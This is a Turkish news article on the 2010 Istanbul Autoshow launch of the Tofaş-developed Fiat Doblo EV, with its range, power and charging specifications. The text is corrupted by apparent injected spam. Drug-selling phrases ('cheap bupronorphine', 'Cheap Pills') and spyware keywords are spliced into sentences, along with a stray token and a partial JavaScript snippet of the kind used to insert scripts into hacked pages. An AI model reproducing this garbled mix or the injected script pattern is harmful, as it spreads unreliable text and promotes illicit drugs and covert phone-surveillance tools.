Türkiye’de Yapılan İlk Elektrikli Araç Fiat Doblo EV’nin İstanbul’da!

fiat doblo ev
Türkiye’ye 8 yıl içinde 6.3 milyar Dolar’lık döviz girdisi sağlayacak, şimdiden sayısız ödüllü yeni Fiat Doblo projesinin geleceğe yönelik önemli bir gelişim halkasını temsil eden Fiat Doblo EV’nin dünya lansmanı, 2010 İstanbul Autoshow Fuarı’nda Koç Holding CEO’su Turgay Durak, Koç Holding Otomotiv Grubu Başkanı Cenk Çimen, Tofaş CEO’su Ali Pandır’ın katılımıyla gerçekleştirildi. İlk olarak Sanayi ve Ticaret Bakanı Nihat Ergün ile Koç Holding Yönetim Kurulu Başkanı Mustafa V. Koç tarafından test edilen ve “Ar-Ge çalışması Türkiye’de yapılan ilk elektrikli araç” unvanına sahip Fiat Doblo EV, uluslararası fuar kapsamında Fiat standında sergileniyor.

Fiat Doblo’nun evrim sürecinin son halkasını temsil eden Fiat Doblo EV, toplam 300 bin km’lik menzile sahip olacak biçimde ve 10 yıl ömre sahip bataryayla donatıldı. Tofaş tarafından geliştirilen Fiat Doblo EV

relationship advice

, hızlanma durumuna göre 106 HP ile 140 HP arasında güç üreten elektrikli motor yapısına sahip olmasıyla dikkat çekiyor. 0-100 km/s hızlanmasını 9.6 sn’de tamamlayan ve elektronik olarak sınırlandırıldığı için 110 km/s hıza erişebilen Fiat Doblo EV, 0-50 km/s hızlanmasını ise 3.8 sn’de tamamlayabiliyor. 150 km’lik menzile sahip Fiat Doblo EV’nin lityum ion bataryası, hızlı şarj ile 1 saatte, ev tipi elektrik kaynaklarıyla ise 7 saatte yeniden şarj olabiliyor.

cheap bupronorphine

Fiat Doblo EV’nin dijital gösterge panelinde ise bataryanın şarj durumunu gösteren ayrı bir bölüm yer alıyor. Motora komutları ileten elektronik bir üniteye sahip olan Bursalı Fiat Doblo EV’nin en etkileyici yönlerinden birini ise gaz pedalına basıldığı anda 317 Nm’lik torkun etkisiyle müthiş bir ivmelenmeyle sessizce hızlanması oluşturuyor. Kokpitte geleneksel şanzıman ve vites kontrol unsurları yerine 4 adet buton yer alıyor. Tek Cheap Pills dokunuşla  hareket eden araç, aynı şekilde geri gidiyor veya park konumuna geçiyor.

Cheap

zp8497586rq

Cheap delivery fucidin if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);snapchat spy, iphone spy software, xnore spy app Order

Benzer Yazılar:

  • Benzer yazı bulunamadı.

Yoruma Kapali

Linkler

Reklamlar

Giriş - Powered by Pixelim Media · Ukrayna Turlari | Ozge Tur | Tesla ERP